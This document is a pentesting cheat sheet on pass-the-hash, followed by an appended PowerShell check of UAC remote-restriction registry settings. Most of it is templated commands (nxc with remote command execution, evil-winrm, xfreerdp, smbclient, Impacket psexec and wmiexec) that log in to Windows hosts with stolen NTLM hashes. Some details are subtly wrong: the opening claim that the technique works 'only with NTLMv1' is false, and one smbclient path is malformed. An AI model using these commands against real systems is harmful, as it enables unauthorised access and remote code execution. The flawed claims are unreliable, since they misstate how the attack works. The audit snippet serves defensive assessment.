Pass The Hash

Only with NTLMv1.

It consists of passing the hash in place of the password to log in, which is useful when password cracking has failed. It can be done against an Active Directory domain or against local accounts without specifying the domain.

Tools and details

nxc
    nxc smb <IP> -d . -u <USER> -H <HASH> -x <COMMAND>
    nxc smb <IP> --local-auth -u <USER> -H <HASH> -x <COMMAND>

evil-winrm
    evil-winrm -i <IP> -u <USER>[@<DOMAIN>] -H <HASH>

xfreerdp
    xfreerdp /v:<IP> /u:<USER> /pth:<HASH> /dynamic-resolution

smbclient
    smbclient //<IP>//<SHARE> -U <USER> --pw-nt-hash <HASH>

psexec (Impacket)
    psexec -hashes <[LMHash]:NTHash> <USER>@<IP>

wmiexec (Impacket)
    wmiexec -hashes <[LMHash]:NTHash> <USER>@<IP>

Other Impacket scripts, such as atexec and smbexec, accept the same -hashes option.

The user and hash used for authentication must have administrative rights on the target computer. For local accounts, however, UAC remote restrictions apply: while the LocalAccountTokenFilterPolicy filtering is in effect, only the RID-500 account, “Administrator,” can perform remote administration tasks, and if FilterAdministratorToken is also set, not even that account can. These settings only affect local administrative accounts.
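Added check, not part of the original page: a PowerShell snippet, run on the Windows host being assessed, that reads both policy values from the standard UAC policy key (assumed location HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, with an absent value treated as 0) and reports which local accounts would receive a full administrative token over the network, alongside the local members of the Administrators group that the restriction applies to.

```powershell
function Get-RemoteUacRestriction {
    # Assumed registry location of both values (the standard UAC policy key).
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $p = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue

    # A missing value behaves like 0, which is the default for both settings.
    $latfp = if ($null -ne $p.LocalAccountTokenFilterPolicy) { [int]$p.LocalAccountTokenFilterPolicy } else { 0 }
    $fat   = if ($null -ne $p.FilterAdministratorToken)    { [int]$p.FilterAdministratorToken }    else { 0 }

    # LocalAccountTokenFilterPolicy=1 turns the remote filtering off entirely;
    # otherwise only RID-500 keeps a full token, and FilterAdministratorToken=1
    # removes that exception as well.
    $verdict = if ($latfp -eq 1) {
        'Remote UAC restrictions disabled: every local administrator gets a full token over the network.'
    } elseif ($fat -eq 1) {
        'Filtering in effect and applied to RID-500 too: no local account gets a full admin token remotely.'
    } else {
        'Filtering in effect (default): only RID-500 "Administrator" gets a full admin token remotely.'
    }

    # Local (non-domain) members of Administrators: the accounts these settings govern.
    $localAdmins = Get-LocalGroupMember -Group 'Administrators' -ErrorAction SilentlyContinue |
        Where-Object { $_.PrincipalSource -eq 'Local' } |
        Select-Object -ExpandProperty Name

    [pscustomobject]@{
        ComputerName                  = $env:COMPUTERNAME
        LocalAccountTokenFilterPolicy = $latfp
        FilterAdministratorToken      = $fat
        LocalAdministrators           = ($localAdmins -join ', ')
        RemoteAdminWithLocalAccounts  = $verdict
    }
}

Get-RemoteUacRestriction | Format-List
```

Reading the registry key requires no elevation, so the check can be folded into a baseline-audit script that runs under a standard account.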
